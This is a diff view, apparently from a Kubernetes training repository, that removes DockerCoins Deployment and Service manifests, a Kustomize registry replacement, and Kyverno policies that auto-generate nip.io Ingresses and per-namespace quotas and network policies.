selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0
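# Sketch of the effect: with delimiter "/" and index 0, the replacement
# swaps the first path component of each matching image, so
#   image: dockercoins/worker:v0.1
# becomes
#   image: ghcr.io/dockercoins/worker:v0.1
# (The redis Deployment is untouched, since its "app" label doesn't
# match the labelSelector.)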

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix
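# Sketch of what this policy generates, assuming a Service named "web"
# is created in namespace "default" while the policy is active
# (A.B.C.D is a placeholder to fill in, as in the policy itself):
#   apiVersion: networking.k8s.io/v1
#   kind: Ingress
#   metadata:
#     name: web
#     namespace: default
#   spec:
#     rules:
#     - host: web.default.A.B.C.D.nip.io
#       http:
#         paths:
#         - backend:
#             service:
#               name: web
#               port:
#                 number: 80
#           path: /
#           pathType: Prefix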

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: http
operator: In
value: "{{request.object.spec.ports[*].name}}"
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,34 +0,0 @@
# Note: this policy uses the operator "AnyIn", which was introduced in Kyverno 1.6.
# (This policy won't work with Kyverno 1.5!)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[*].port}}"
operator: AnyIn
value: [ 80 ]
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix
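# This variant reads the domain suffix from a ConfigMap instead of
# hardcoding it. A minimal ConfigMap matching the context lookup above
# (one is needed in each namespace where Services get created):
#   apiVersion: v1
#   kind: ConfigMap
#   metadata:
#     name: ingress-domain-name
#   data:
#     domain: A.B.C.D.nip.io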

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
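# Net effect, sketched: every Namespace created while this policy is
# active automatically receives a LimitRange (per-container defaults
# and bounds), a ResourceQuota (aggregate caps on requests and limits),
# and a NetworkPolicy that only allows ingress from pods in the same
# namespace. One way to verify, after creating a test namespace:
#   kubectl --namespace test get limitrange,resourcequota,networkpolicy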

Some files were not shown because too many files have changed in this diff.